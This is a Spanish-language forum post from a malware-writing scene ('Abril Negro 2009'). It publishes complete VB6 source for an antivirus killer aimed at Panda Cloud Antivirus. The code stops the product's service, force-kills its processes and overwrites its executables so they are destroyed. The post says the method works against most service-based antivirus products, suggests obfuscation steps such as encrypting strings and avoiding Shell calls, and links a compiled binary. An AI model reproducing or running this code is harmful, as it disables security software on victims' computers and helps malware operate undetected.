Bueno, primero quiero aclarar que este programa/source no entra dentro del "concurso de desarrollo de malware de Abril Negro 2009". Pero sí entra dentro del boletín para Abril Negro 2009, como prueba de concepto...Anti Cloud Antivirus by MadAntrax
He diseñado una simple función que aprovecha los comandos típicos de Windows (taskkill, net, etc...) y los he aplicado en forma de bucles FOR y Sleep's para generar un AV-Killer genérico. En éste caso lo he diseñado para el nuevo Cloud Antivirus de Panda
Que es Cloud Antivirus?Es el nuevo antivirus gratuito desarrollado por Panda, usando un método de programación que evita sobrecargar la CPU del usuario (Cloud Computing). He analizado el AV y he decidido crear un AV Killer para "matar" el nuevo producto de Panda.
:http://www.cloudantivirus.com/default.aspx?lang=spa
:http://es.wikipedia.org/wiki/Computaci%C3%B3n_en_nube
El source del programa es el siguiente:
modAntiCloudAV.basPrivate Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Function StopService(ByVal sName As String) As Boolean
On Error Resume Next
Dim i As Integer
For i = 1 To 3
Shell "net stop " & sName, vbHide
Sleep 250
Next i
Sleep 1000
DoEvents
StopService = True
End Function
Function DestroyFile(ByVal sFileName As String, ByVal sFilePath As String) As Boolean
On Error Resume Next
Dim i As Integer
For i = 1 To 3
Shell "taskkill /F /IM " & sFileName, vbHide
Sleep 250
Next i
Sleep 1000
DoEvents
For i = 1 To 3
Open sFilePath For Output As #1
Print #1, "destroyed!"
Close #1
Sleep 10
Next i
DoEvents
DestroyFile = True
End Function
Éste código es genérico para la mayoría de Antivirus que basan su "protección" en servicios. Éste ejemplo no es válido para los Antivirus que basan su "protección" en drivers o hooks (Kaspersky, etc...). Para usar el módulo y matar CloudAV se utiliza así:
Private Sub CommandXP1_Click()
On Error Resume Next
Dim WShell As Object
Dim CloudPath As String
CommandXP1.Enabled = False
Set WShell = CreateObject("WScript.Shell")
CloudPath = WShell.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Panda Security\Nano Av\Setup\Path")
Set WShell = Nothing
If CloudPath = "" Then
MsgBox "No se ha encontrado Cloud Antivirus instalado en el sistema", vbExclamation, "Anti-CloudAV"
Else
StopService "NanoServiceMain"
DoEvents
DestroyFile "PSUNMain.exe", CloudPath & "PSUNMain.exe"
DoEvents
DestroyFile "PSANHost.exe", CloudPath & "PSANHost.exe"
DoEvents
DestroyFile "PSANToManager.exe", CloudPath & "PSANToManager.exe"
DoEvents
'CloudAV destroyed
MsgBox "Proceso finalizado correctamente, comprueba si tu CloudAV sigue funcionando", vbInformation, "Anti-CloudAV"
End If
CommandXP1.Enabled = True
End Sub
El source es mejorable, se puede modificar para que no haga tantos bucles ni tantos sleep's y mejorar la rápidez. Pero como es una prueba de concepto... prefiero dejarlo así para evitar posibles copy&paste de noob's. Los que quieran usar ésta técnica tendrán la oportunidad de programarse correctamente un modulo más eficiente (evitar usar el objecto WScript, no usar Shell, cifrar las String's, control de errores, etc...)
LINK DE DESCARGA: antiCloudAV (Fichero Compilado + Source en VB6)
Saludos.